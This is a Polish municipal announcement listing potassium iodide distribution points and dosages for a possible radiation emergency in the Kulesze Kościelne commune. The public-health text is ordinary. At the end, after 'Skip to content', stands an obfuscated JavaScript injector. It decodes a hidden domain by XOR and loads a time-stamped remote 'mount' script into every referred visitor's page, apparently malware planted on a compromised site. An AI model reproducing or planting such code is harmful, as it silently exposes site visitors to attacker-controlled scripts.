Aktualności

Działania prewencyjne – plan dystrybucji tabletek jodku potasu – w przypadku wystapienia zdarzenia radiacyjnego!

paź 3, 2022 | Aktualności

Działania prewencyjne – plan dystrybucji tabletek jodku potasu

Zgodnie z poleceniem władz centralnych gmina Kulesze Kościelne realizuje niezbędne działania prewencyjne, w tym przygotowania do dystrybucji tabletek zawierających jodek potasu na wypadek wystąpienia zagrożenia radiacyjnego. Ich wydanie mieszkańcom nastąpi tylko w wypadku przejścia przez nasz kraj chmury radioaktywnej.

Podajemy do publicznej wiadomości wykaz punktów dystrybucji tabletek jodku potasu na terenie gminy Kulesze Kościelne oraz dawkowanie:

Lp.Punkt wydawaniaMiejscowości
    1.    Dom Kultury  w m. Chojane SierociętaChojane Bąki, Chojane Gorczany, Chojane Pawłowięta, Chojane Piecki, Chojane Sierocięta, Chojane Stankowięta
    2.    Centrum Integracji i Kultury w m.  Gołasze MościckieCzarnowo Biki, Gołasze Dąb, Gołasze Mościckie, Stare Wykno, Tybory Uszyńskie
  3.  Świetlica Wiejska w m.  Kalinowo SolkiFaszcze, Kalinowo Solki, Nowe Kalinowo, Stare Kalinowo,
    4.  Świetlica Wiejska w m. Nowe GrodzkieGrodzkie Szczepanowięta, Niziołki Dobki, Nowe Grodzkie, Stare Grodzkie, Wnory Wypychy,
        5.        Centrum Kulturalno-Edukacyjne Wsi w Kuleszach KościelnychKulesze Kościelne, Kulesze Litewka, Kulesze Podawce, Kulesze Podlipne, Leśniewo Niedźwiedź I i II, Nowe Wykno, Stare Litwa, Stare Niziołki, Stypułki Giemzino, Wnory Pażochy, Wnory Wiechy,

Dawkowanie tabletek jodku potasu: 

  1. Noworodki do 1 miesiąca życia – 1/4 tabletki (ćwierć tabletki 16 mg).
  2. Dzieci w wieku od 1 miesiąca do 3 lat – 1/2 tabletki (pół tabletki 32 mg).
  3. Dzieci w wieku od 3 do 12 lat – 1 tabletka 65 mg.
  4. Dorośli, osoby w podeszłym wieku i dzieci w wieku powyżej 12 lat-2 tabletki 130 mg.

Przyjęty plan ma charakter działania prewencyjnego, aby w przypadku wystąpienia zdarzenia radiacyjnego mieli Państwo świadomość gdzie się zgłosić, aby otrzymać preparat.

W przypadku wystąpienia zagrożenia, akcją dystrybucji preparatów stabilnego jodku potasu zostaną objęci mieszkańcy gminy do 60. roku życia (ze względów medycznych).

Jeśli dojdzie do zdarzenia radiacyjnego będzie ono komunikowane w mediach, a po wydaniu zarządzenia Wojewody Podlaskiego, także za pośrednictwem mediów lokalnych z określeniem rozpoczęcia wydawania preparatów na terenie gminy Kulesze Kościelne.

Z informacji, które otrzymujemy z administracji rządowej, wynika, że ryzyko wystąpienia zdarzenia radiacyjnego jest minimalne. Jednak należy się do niego wcześniej przygotować.

Prosimy o systematyczne zapoznawanie się z bieżącą sytuacją radiacyjną, a w przypadku uruchomienia procedury wydawania preparatów o stosowanie się do wskazówek i zaleceń ogłaszanych w ogólnopolskich, lokalnych mediach oraz stronie internetowej urzędu  www.kuleszek.pl

Pamiętajmy! Przyjmowanie preparatu jodku potasu, w sytuacji, gdy nie występuje zagrożenie nie uchroni przed ewentualnymi skutkami katastrofy radiacyjnej w przyszłości, a może doprowadzić do wielu szkodliwych dla zdrowia konsekwencji.

W razie wątpliwości przed przyjęciem preparatu najlepiej zasięgnąć opinii swojego lekarza pierwszego kontaktu.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);